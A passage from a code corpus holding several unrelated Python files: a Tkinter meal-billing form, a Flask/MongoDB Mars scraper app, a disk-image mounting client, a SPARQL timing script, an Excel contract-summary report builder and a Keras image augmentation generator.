blue\")\r\ne1.grid(row=0,column=1)\r\n\r\nlbl2=Label(frame2,text=\"Fries Meal\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl2.grid(row=1)\r\ne2=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel 
blue\")\r\ne2.grid(row=1,column=1)\r\n\r\nlbl3=Label(frame2,text=\"Lunch Meal\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl3.grid(row=2)\r\ne3=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne3.grid(row=2,column=1)\r\n\r\nlbl4=Label(frame2,text=\"Burger Meal\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl4.grid(row=3)\r\ne4=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne4.grid(row=3,column=1)\r\n\r\nlbl5=Label(frame2,text=\"Pizza Meal\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl5.grid(row=4)\r\ne5=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne5.grid(row=4,column=1)\r\n\r\nlbl6=Label(frame2,text=\"Cheese Burger\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl6.grid(row=5)\r\ne6=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne6.grid(row=5,column=1)\r\n\r\nmeal1=Label(frame2,text=\"Meal 1\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nmeal1.grid(row=6)\r\nm1=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nm1.grid(row=6,column=1)\r\n#------------------------------------\r\n\r\nframe3=Frame(root)\r\nframe3.pack(side=RIGHT)\r\n\r\nmeal2=Label(frame3,text=\"Meal 2\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nmeal2.grid(row=0)\r\nm2=Entry(frame3,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nm2.grid(row=0,column=1)\r\n\r\nlbl7=Label(frame3,text=\"Drinks\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl7.grid(row=1)\r\ne7=Entry(frame3,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne7.grid(row=1,column=1)\r\n\r\nlbl8=Label(frame3,text=\"Cost\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl8.grid(row=2)\r\ne8=Entry(frame3,textvariable=cost,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne8.grid(row=2,column=1)\r\n\r\nlbl9=Label(frame3,text=\"Service Charge\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl9.grid(row=3)\r\ne9=Entry(frame3,textvariable=service,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne9.grid(row=3,column=1)\r\n\r\nlbl10=Label(frame3,text=\"Tax\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl10.grid(row=4)\r\ne10=Entry(frame3,textvariable=tax,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne10.grid(row=4,column=1)\r\n\r\nlbl11=Label(frame3,text=\"Subtotal\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl11.grid(row=5)\r\ne11=Entry(frame3,textvariable=cost,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne11.grid(row=5,column=1)\r\n\r\nlbl12=Label(frame3,text=\"Total\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl12.grid(row=6)\r\ne12=Entry(frame3,textvariable=final,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne12.grid(row=6,column=1)\r\n\r\n\r\n#sheet.write()\r\n# table.execute(\"INSERT INTO ORDERS VALUES({},{},{},{},{},{},{},{},{},{},{},{})\".format(e1,e2,e3,e4,e5,e6,e7,e8,e9,e10,e11,e12))\r\n# table.commit()\r\n\r\n#---------------------------------\r\n\r\nframe4=Frame(root)\r\nframe4.pack(side=BOTTOM)\r\nprice=Button(frame4,text=\"price\",height=3,width=10,font=(\"comic sans ms\",\"11\"),fg=\"steel blue\",command=price)\r\nprice.grid(row=0,column=0,padx=10,pady=10)\r\ntotal=Button(frame4,text=\"total\",height=3,width=10,font=(\"comic sans ms\",\"11\"),fg=\"steel blue\",command=amount)\r\ntotal.grid(row=0,column=5,padx=10,pady=10)\r\nreset=Button(frame4,text=\"reset\",height=3,width=10,font=(\"comic sans ms\",\"11\"),fg=\"steel 
blue\",command=reset)\r\nreset.grid(row=0,column=10,padx=10,pady=10)\r\nexit=Button(frame4,text=\"exit\",height=3,width=10,font=(\"comic sans ms\",\"11\"),fg=\"steel blue\",command=root.quit)\r\nexit.grid(row=0,column=15,padx=10,pady=10)\r\n\r\n#--------------------------------------------------------\r\n\r\nmainloop()\r\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"200604080","text":"# import necessary libraries\r\nfrom flask import Flask, render_template, redirect\r\nfrom flask_pymongo import PyMongo\r\nimport scrape_mars\r\nimport os\r\n\r\n\r\n# create instance of Flask app\r\napp = Flask(__name__)\r\n\r\n# initialize MongoDB\r\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/mars_db\"\r\nmongo = PyMongo(app)\r\n\r\n# Create route that renders index.html template and finds documents from mongo\r\n@app.route(\"/\")\r\ndef home(): \r\n\r\n # Find data\r\n mars_info = mongo.db.mars_collection.find_one()\r\n\r\n # Return template and data\r\n return render_template(\"index.html\", mars_info=mars_info)\r\n\r\n# Route that will trigger scrape function\r\n@app.route(\"/scrape\")\r\ndef scrape(): \r\n\r\n # Run each scraper and merge its results into one document (assumes each helper returns a dict)\r\n mars_info = scrape_mars.scrape_mars_news()\r\n mars_info.update(scrape_mars.scrape_mars_image())\r\n mars_info.update(scrape_mars.scrape_mars_facts())\r\n mars_info.update(scrape_mars.scrape_mars_weather())\r\n mars_info.update(scrape_mars.scrape_mars_hemispheres())\r\n mongo.db.mars_collection.update({}, mars_info, upsert=True)\r\n\r\n return redirect(\"/\", code=302)\r\n\r\nif __name__ == \"__main__\": \r\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"252835592","text":"# Copyright 2019 The MITRE CORPORATION\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\n\nimport requests\n\nfrom thumbtack_client.ThumbtackClientException import ThumbtackClientException\n\nlogger = logging.getLogger(__name__)\n\n\nclass ThumbtackClient(object):\n \"\"\"\n Creates the ThumbtackClient object using the `requests.Session` class\n so that its 'delete', 'get', and 'put' methods can be used to send requests.\n \"\"\"\n def __init__(self, host='127.0.0.1', port=8208):\n \"\"\"\n Initializes the ThumbtackClient object with the `requests.Session` class\n\n Parameters\n ----------\n host : str\n default host address is 127.0.0.1\n port: int\n default port is 8208\n \"\"\"\n self.session = requests.Session()\n self._host = '{}:{}'.format(host, port)\n\n def list_mounted_images(self):\n \"\"\"\n Returns\n -------\n dict\n A JSON serialized dictionary of all mounted images in: 'http://127.0.0.1:8208/mounts/'\n \"\"\"\n url = 
'http://{}/mounts/'.format(self._host)\n response = self._get(url, expected_status=200)\n return response.json()\n\n def mount_image(self, image_path):\n \"\"\"\n Parameters\n ----------\n image_path : str\n file path of the image to be mounted\n\n Returns\n -------\n dict\n the JSON-decoded body of the response to the PUT request\n \"\"\"\n url = 'http://{}/mounts/{}'.format(self._host, image_path.lstrip('/'))\n response = self._put(url, expected_status=200)\n return response.json()\n\n def unmount_image(self, image_path):\n \"\"\"Deletes supplied image from list of mounted images\n\n Parameters\n ----------\n image_path : str\n file path of the image to be deleted\n\n Returns\n -------\n dict\n the JSON-decoded body of the response to the DELETE request\n \"\"\"\n url = 'http://{}/mounts/{}'.format(self._host, image_path.lstrip('/'))\n response = self._delete(url, expected_status=200)\n return response.json()\n\n def _put(self, url, expected_status=None, **kwargs):\n return self._do_method_checked('put', url, expected_status, **kwargs)\n\n def _get(self, url, expected_status=None, **kwargs):\n return self._do_method_checked('get', url, expected_status, **kwargs)\n\n def _delete(self, url, expected_status=None, **kwargs):\n return self._do_method_checked('delete', url, expected_status, **kwargs)\n\n def _do_method_checked(self, method, url, expected_status, **kwargs):\n \"\"\"This checks that the received response to the requested method was successful, otherwise\n raises exception and displays the status code received.\n\n Parameters\n ----------\n method : str\n 'put', 'get', or 'delete'\n url : str\n same url used to mount or unmount the image\n expected_status: int, list of int, or None\n HTTP response codes that are expected\n kwargs : optional\n optional arguments passed through to the underlying `requests` call\n\n Returns\n -------\n requests.Response\n The value returned when the specified method is requested of the ThumbtackClient\n session\n \"\"\"\n response = None\n try:\n response = getattr(self.session, method)(url, **kwargs)\n except requests.ConnectionError as e:\n raise ThumbtackClientException(str(e))\n if expected_status is not None:\n if not hasattr(expected_status, '__iter__'):\n expected_status = [expected_status]\n\n if response.status_code not in expected_status:\n msg = 'Unexpected status {} from {} ({}); expected {}' \\\n .format(response.status_code, response.url, response.request.method, expected_status)\n if response.text:\n msg += ' - response text: {}'.format(response.text)\n raise ThumbtackClientException(msg)\n return response\n","sub_path":"src/thumbtack_client/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"128811969","text":"from time import time\nimport requests\nfrom requests.auth import HTTPBasicAuth\nimport sys\nfrom argparse import ArgumentParser\nimport json\nimport logging\n\n\n\n\n\n\nSPARQL_ENDPOINT=\"http://sparql-evs-dev.nci.nih.gov/sparql\"\nGRAPH=\"\"\nCODE=\"C4872\"\n\n\n\nSPARQL_USER = \"NA\"\nSPARQL_PASSWORD = \"NA\"\n\nprefix = '''\nPREFIX :\nPREFIX ncit: <http://ncicb.nci.nih.gov/xml/owl/EVS/Thesaurus.owl#>\nPREFIX base:\nPREFIX owl: <http://www.w3.org/2002/07/owl#>\nPREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\nprefix franzOption_logQuery: \n'''\n\n \n'''\n# run_sparql_query\n'''\n\ndef run_sparql_query(query):\n logging.basicConfig(level=logging.DEBUG)\n headers = {'Accept': 'application/sparql-results+json'}\n r = 
requests.post(SPARQL_ENDPOINT,\n headers=headers,data={ \"query\": query },\n auth=HTTPBasicAuth(SPARQL_USER,SPARQL_PASSWORD))\n print(r.status_code)\n if r.status_code != 200:\n sys.stderr.write(\"Problem Status Code: \" + str(r.status_code) + \"\\n\")\n sys.exit(1)\n \n return r.json()\n\n\ndef constructConceptLabelQuery(CODE,GRAPH):\n print(\"constructConceptLabelQuery\")\n QUERY='''SELECT ?conceptLabel\n { GRAPH $GRAPH\n { ?concept a owl:Class .\n ?concept :NHC0 \"$CODE\" .\n ?concept rdfs:label ?conceptLabel\n }\n }\n '''\n QUERY2 = QUERY.replace(\"$CODE\",CODE)\n query = QUERY2.replace(\"$GRAPH\",GRAPH)\n query = prefix + query\n print (query)\n obj = run_sparql_query(query)\n return obj['results']['bindings']\n\n \ndef constructConceptLabelQuery2(CODE,GRAPH):\n print(\"constructConceptLabelQuery2\")\n QUERY='''SELECT ?conceptLabel\n { GRAPH $GRAPH\n { ncit:$CODE rdfs:label ?conceptLabel\n }\n }\n '''\n QUERY2 = QUERY.replace(\"$CODE\",CODE)\n query = QUERY2.replace(\"$GRAPH\",GRAPH)\n query = prefix + query\n print (query)\n obj = run_sparql_query(query)\n return obj['results']['bindings']\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n prog=\"checkEndpoint\",\n description=\"Do SPARQL timings.\")\n \n args = parser.parse_args()\n# GRAPH=\"\"\n# GRAPH=\"\"\n \n print(\"time queries from \" + SPARQL_ENDPOINT)\n print(\"==========================================================\")\n \n T0 = time()\n results = constructConceptLabelQuery(CODE,GRAPH)\n T1 = time()\n DIFF = (T1 - T0)\n print(DIFF)\n print(json.dumps(results,indent=2))\n \n print(\"==========================================================\")\n \n print(\"time queries from \" + SPARQL_ENDPOINT)\n print(\"==========================================================\")\n \n T0 = time()\n results = constructConceptLabelQuery2(CODE,GRAPH)\n T1 = time()\n DIFF = (T1 - T0)\n print(DIFF)\n print(json.dumps(results,indent=2))\n \n ","sub_path":"SPARQL_Test/src/testTiming_evsrestapi.py","file_name":"testTiming_evsrestapi.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"371913680","text":"# -*- coding: utf-8 -*-\n#rid 57 STP\nimport xlsxwriter\nfrom io import BytesIO\nimport datetime\nfrom .. 
import stp_config\n\ndef form_url(params):\n\tbase_url = str(stp_config.CONST.API_URL_PREFIX) + 'stp_contract_summary/'\n\tbase_url += str(params[\"year\"])\n\treturn base_url\n\n\n#by municipality\ndef render(res, params):\n\n\trid = params[\"rid\"]\n\tyear = params[\"year\"]\n\tcon_num = params[\"con_num\"]\n\tassign_num = params[\"assign_num\"]\n\n\toutput = BytesIO()\n\tworkbook = xlsxwriter.Workbook(output, {'in_memory': True})\n\tworksheet = workbook.add_worksheet()\n\tdata = res\n\ttitle = 'Summary of Contract Items, Grouped by Municipality'\n\ttitle2 = 'Top Performers, Grouped by Municipality'\n\n\t#MAIN DATA FORMATTING\n\tformat_text = workbook.add_format(stp_config.CONST.FORMAT_TEXT)\n\tformat_num = workbook.add_format(stp_config.CONST.FORMAT_NUM)\n\titem_header_format = workbook.add_format(stp_config.CONST.ITEM_HEADER_FORMAT)\t\t\n\tsubtitle_format = workbook.add_format(stp_config.CONST.SUBTITLE_FORMAT)\n\n\t#set column width\n\tworksheet.set_column('A:A', 12.56)\n\tworksheet.set_column('B:B', 47.78)\n\tworksheet.set_column('C:C', 14.11)\n\tworksheet.set_column('D:D', 15.78)\n\tworksheet.set_column('E:E', 33.89)\n\tworksheet.set_column('F:F', 8.99)\n\t#worksheet.set_column('G:G', 11.33)\n\t#worksheet.set_column('H:H', 11.89)\n\t#worksheet.set_column('I:I', 11)\n\t#worksheet.set_column('J:J', 9.65)\n\n\t#set row\n\tworksheet.set_row(0,36)\n\tworksheet.set_row(1,36)\n\tworksheet.set_row(5,23.4)\n\t#worksheet.set_row(6, 31.2)\n\n\t#HEADER\n\t#write general header and format\n\trightmost_idx = 'F'\n\tstp_config.const.write_gen_title(title, workbook, worksheet, rightmost_idx, year, con_num)\n\n\t#additional header image\n\tworksheet.insert_image('E1', stp_config.CONST.ENV_LOGO,{'x_offset':70,'y_offset':22, 'x_scale':0.5,'y_scale':0.5, 'positioning':2})\n\n\t#MAIN DATA\n\t##Making dict with key as group by id and distinct contract item num as value\n\tforesters = {}\n\n\t\n\tfor afid, forester in enumerate(data[\"items\"]):\n\t\tif not data[\"items\"][afid][\"municipality\"] in foresters.keys():\n\t\t\t# add mun as key\n\t\t\tforesters[data[\"items\"][afid][\"municipality\"]] = []\n\t\t\t# append contract item num to []\n\t\t\tif data[\"items\"][afid][\"contract_item_num\"] not in foresters[data[\"items\"][afid][\"municipality\"]]:\n\t\t\t\tforesters[data[\"items\"][afid][\"municipality\"]].append(data[\"items\"][afid][\"contract_item_num\"])\n\t\telif data[\"items\"][afid][\"municipality\"] in foresters.keys():\n\t\t\t# append contract item num to []\n\t\t\tif data[\"items\"][afid][\"contract_item_num\"] not in foresters[data[\"items\"][afid][\"municipality\"]]:\n\t\t\t\tforesters[data[\"items\"][afid][\"municipality\"]].append(data[\"items\"][afid][\"contract_item_num\"])\n\n\n\t# writing main data\n\tcr = 7 #current row, starting at offset where data begins\n\titem_fields = ['Contract Item No.', 'Location', 'RINs', 'Status', 'Item', 'Quantity']\n\t#loop over all municipalities\n\tfor afid, forester in enumerate(foresters.keys()):\n\t\tworksheet.merge_range('A' + str(cr) + ':F' + str(cr), str('Municipality: ' + forester), subtitle_format) #was format_text\n\t\tworksheet.write_row('A' + str(cr+1), item_fields, item_header_format)\n\t\tcr += 2\n\n\t\tfor cid, contract_item in enumerate(foresters[forester]):\n\t\t\tmerge_top_idx = cr\n\t\t\tlocation = ''\n\t\t\trins = ''\n\t\t\tdescription = ''\n\n\t\t\tfor idx, val in enumerate(data[\"items\"]):\n\t\t\t\tif data[\"items\"][idx][\"municipality\"] == forester and data[\"items\"][idx][\"contract_item_num\"] == contract_item:\n\n\t\t\t\t\ta1 = 
data[\"items\"][idx][\"contract_item_num\"] if \"contract_item_num\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('A' + str(cr), a1 if a1 is not None else \"\", format_text)\n\n\t\t\t\t\ta2 = data[\"items\"][idx][\"location\"] if \"location\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('B' + str(cr), a2 if a2 is not None else \"\", format_text)\n\t\t\t\t\t\n\t\t\t\t\ta3 = data[\"items\"][idx][\"rins\"] if \"rins\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('C' + str(cr), a3 if a3 is not None else \"\", format_text)\n\t\t\t\t\t\n\t\t\t\t\ta4 = data[\"items\"][idx][\"description\"] if \"description\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('D' + str(cr), a4 if a4 is not None else \"\", format_text)\n\t\t\t\t\t\n\t\t\t\t\ta5 = data[\"items\"][idx][\"item\"] if \"item\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('E' + str(cr), a5 if a5 is not None else \"\", format_text)\n\t\t\t\t\t\n\t\t\t\t\ta6 = data[\"items\"][idx][\"quantity\"] if \"quantity\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('F' + str(cr), a6 if a6 is not None else \"\", format_num)\n\t\t\t\t\t\n\t\t\t\t\tcr += 1\n\t\t\t\t\tmerge_bottom_idx = cr - 1\n\t\t\t\t\tlocation = a2\n\t\t\t\t\trins = a3\n\t\t\t\t\tdescription = a4\n\n\n\t\t\tworksheet.merge_range('A'+ str(merge_top_idx) + ':A' + str(merge_bottom_idx) , contract_item, format_text)\n\t\t\tworksheet.merge_range('B'+ str(merge_top_idx) + ':B' + str(merge_bottom_idx) , location, format_text)\n\t\t\tworksheet.merge_range('C'+ str(merge_top_idx) + ':C' + str(merge_bottom_idx) , rins, format_text)\n\t\t\tworksheet.merge_range('D'+ str(merge_top_idx) + ':D' + str(merge_bottom_idx) , description, format_text)\n\t\t\tworksheet.set_row(cr,stp_config.CONST.BREAKDOWN_INBETWEEN_HEIGHT)\n\t\t\t\n\n\t\tcr += 1\n\n\t#Group by contract item number\n\tcontract_items = []\n\ttp = {} # tp = top performers\n\n\tfor iid, item in enumerate(data[\"items\"]):\n\t\tif not data[\"items\"][iid][\"contract_item_num\"] in contract_items:\n\t\t\tcontract_items.append(data[\"items\"][iid][\"contract_item_num\"])\n\t\n\t#calculate number and overall\n\ttp[\"Overall\"] = {\"top_p_qty\": 0, \"non_top_p_qty\" : 0, \"total_qty\" : 0}\n\n\tfor cid, item in enumerate(data[\"items\"]):\n\t\t# first time having the key\n\t\tif not data[\"items\"][cid][\"contract_item_num\"] in tp.keys(): \n\t\t\tif data[\"items\"][cid][\"top_performer\"] == 'Y':\n\t\t\t\t#for different reports, change contract_item_num to other group by ids\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]] = {\"top_p_qty\": data[\"items\"][cid][\"quantity\"], \"non_top_p_qty\" : 0, \"total_qty\" : data[\"items\"][cid][\"quantity\"]}\n\t\t\t\ttp[\"Overall\"][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\telif data[\"items\"][cid][\"top_performer\"] == 'N':\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]] = {\"top_p_qty\": 0, \"non_top_p_qty\" : data[\"items\"][cid][\"quantity\"], \"total_qty\" : data[\"items\"][cid][\"quantity\"]}\n\t\t\t\ttp[\"Overall\"][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\t\t# second time having the key\n\t\telif data[\"items\"][cid][\"contract_item_num\"] in tp.keys():\n\t\t\tif data[\"items\"][cid][\"top_performer\"] == 
'Y':\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\t\t\telif data[\"items\"][cid][\"top_performer\"] == 'N':\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\n\t##============TOP PERFORMAERS SUB TABLE=============\n\t#TOP PERFORMERS COLUMN NAMES\n\titem_fields = ['Municipality', 'Top Performer', 'Top Performer %', 'Non Top Performer', 'Non Top Performer %', 'Total']\n\n\t\n\t#TOP PERFORMER CALCULATION\n\tcontract_items = []\n\ttp = {} # tp = top performers\n\n\tfor iid, item in enumerate(data[\"items\"]):\n\t\tif not data[\"items\"][iid][\"municipality\"] in contract_items:\n\t\t\tcontract_items.append(data[\"items\"][iid][\"municipality\"])\n\t\n\t#calculate number and overall\n\ttp[\"Overall\"] = {\"top_p_qty\": 0, \"non_top_p_qty\" : 0, \"total_qty\" : 0}\n\n\tfor cid, item in enumerate(data[\"items\"]):\n\t\t# first time having the key\n\t\tif not data[\"items\"][cid][\"municipality\"] in tp.keys(): \n\t\t\tif data[\"items\"][cid][\"top_performer\"] == 'Y':\n\t\t\t\t#for different reports, change contract_item_num to other group by ids\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]] = {\"top_p_qty\": data[\"items\"][cid][\"quantity\"], \"non_top_p_qty\" : 0, \"total_qty\" : data[\"items\"][cid][\"quantity\"]}\n\t\t\t\ttp[\"Overall\"][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\telif data[\"items\"][cid][\"top_performer\"] == 'N':\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]] = {\"top_p_qty\": 0, \"non_top_p_qty\" : data[\"items\"][cid][\"quantity\"], \"total_qty\" : data[\"items\"][cid][\"quantity\"]}\n\t\t\t\ttp[\"Overall\"][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\t\t# second time having the key\n\t\telif data[\"items\"][cid][\"municipality\"] in tp.keys():\n\t\t\tif data[\"items\"][cid][\"top_performer\"] == 'Y':\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\t\t\telif data[\"items\"][cid][\"top_performer\"] == 'N':\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\t#calculate percentage and write top performers into table\n\tpercent_fmt = workbook.add_format({'num_format': 
'0.00%','border':True,'border_color':'gray',})\n\trowcount = 0\n\t#cr -= 1 # overall is the first row\n\n\tif tp[\"Overall\"][\"total_qty\"] > 0:\n\t\tworksheet.write_row( \"A\" + str(cr), item_fields, item_header_format)\n\t\t#cr += 1\n\n\t\tfor idx, cnum in enumerate(tp):\n\t\t\tif cnum != \"Overall\":\n\t\t\t\tworksheet.write(\"A\" + str(idx + cr), cnum, format_text)\n\t\t\t\tworksheet.write(\"B\" + str(idx + cr), tp[cnum][\"top_p_qty\"], format_num)\n\t\t\t\tworksheet.write(\"C\" + str(idx + cr), tp[cnum][\"top_p_qty\"]/tp[cnum][\"total_qty\"], percent_fmt)\n\t\t\t\tworksheet.write(\"D\" + str(idx + cr), tp[cnum][\"non_top_p_qty\"], format_num)\n\t\t\t\tworksheet.write(\"E\" + str(idx + cr), tp[cnum][\"non_top_p_qty\"]/tp[cnum][\"total_qty\"], percent_fmt)\n\t\t\t\tworksheet.write(\"F\" + str(idx + cr), tp[cnum][\"total_qty\"], format_num)\n\n\t\t\t\trowcount = idx\n\n\t\tcr += 1 # overall was the first row\n\t\t#write overall data\n\t\tworksheet.write(\"A\" + str(rowcount + cr), \"Overall\", format_text)\n\t\tworksheet.write(\"B\" + str(rowcount + cr), tp[\"Overall\"][\"top_p_qty\"], format_num)\n\t\tworksheet.write(\"C\" + str(rowcount + cr), tp[\"Overall\"][\"top_p_qty\"]/tp[\"Overall\"][\"total_qty\"], percent_fmt)\n\t\tworksheet.write(\"D\" + str(rowcount + cr), tp[\"Overall\"][\"non_top_p_qty\"], format_num)\n\t\tworksheet.write(\"E\" + str(rowcount + cr), tp[\"Overall\"][\"non_top_p_qty\"]/tp[\"Overall\"][\"total_qty\"], percent_fmt)\n\t\tworksheet.write(\"F\" + str(rowcount + cr), tp[\"Overall\"][\"total_qty\"], format_num)\n\t\n\t#====ending=======\n\n\n\n\tworkbook.close()\n\t\n\txlsx_data = output.getvalue()\n\treturn xlsx_data","sub_path":"stp/report_classes/stp_cis_m.py","file_name":"stp_cis_m.py","file_ext":"py","file_size_in_byte":11047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"546646875","text":"import numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils import np_utils\n\ndef keras_image_generator():\n    datagen = ImageDataGenerator(\n        # set the input mean to 0 over the whole dataset\n        featurewise_center=False,\n        # set the mean of each sample to 0\n        samplewise_center=False,\n        # divide the inputs by the std of the whole dataset\n        featurewise_std_normalization=False,\n        # divide each input by its own std\n        samplewise_std_normalization=False,\n        # apply ZCA whitening\n        zca_whitening=False,\n        # epsilon value for ZCA whitening\n        zca_epsilon=1e-06,\n        # random image rotation range (deg 0 to 180)\n        rotation_range=30,\n        # randomly shift images horizontally\n        width_shift_range=0.1,\n        # randomly shift images vertically\n        height_shift_range=0.1,\n        # set the random shear range\n        shear_range=0.,\n        # set the random zoom range\n        zoom_range=0.,\n        # set the random channel shift range\n        channel_shift_range=0.,\n        # set the fill mode for points outside the input boundaries\n        fill_mode='nearest',\n        # value used when fill_mode = \"constant\"\n        cval=0.,\n        # randomly flip images horizontally\n        horizontal_flip=True,\n        # randomly flip images vertically\n        vertical_flip=False)\n    return datagen\n\ndef image_generator_2Dto3D(data, label, datagen, class_num, batch_size = 8, shuffle=True): #Input dim (n,64,64,64)\n    datagen.fit(data)\n    for data_batch, label_batch in datagen.flow(data, label, batch_size=batch_size, shuffle = shuffle):\n        yield(np.expand_dims(data_batch, axis=-1), np_utils.to_categorical(label_batch, class_num))\n\n\n","sub_path":"mapper/keras_generator.py","file_name":"keras_generator.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"353690550","text":"import csv\nfrom sys import platform\nfrom date import Date\n\nf = open(\"csv/questionnaires/quest_mdv_temps.csv\",\"r\")\ndates_diag = []\nr = csv.reader(f, delimiter=\";\")\nnext(f)\n\nfor 
